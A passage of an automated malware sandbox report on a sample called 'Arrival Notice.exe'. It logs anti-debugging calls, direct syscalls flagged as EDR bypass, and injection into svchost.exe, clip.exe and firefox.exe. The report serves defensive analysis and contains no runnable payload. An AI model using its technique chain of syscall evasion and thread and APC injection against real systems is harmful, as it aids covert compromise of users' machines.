            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]1_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]1_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]1_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]1_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]1_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]1_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]1_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]1_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]1_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]1_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]1_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]1_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]1_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]1_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]1_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]1_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]1_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00410B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00410B62
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003E2622
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003D083F
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D09D5 SetUnhandledExceptionFilter,0_2_003D09D5
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003D0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 1700Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Arrival Notice.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D6A008Jump to behavior
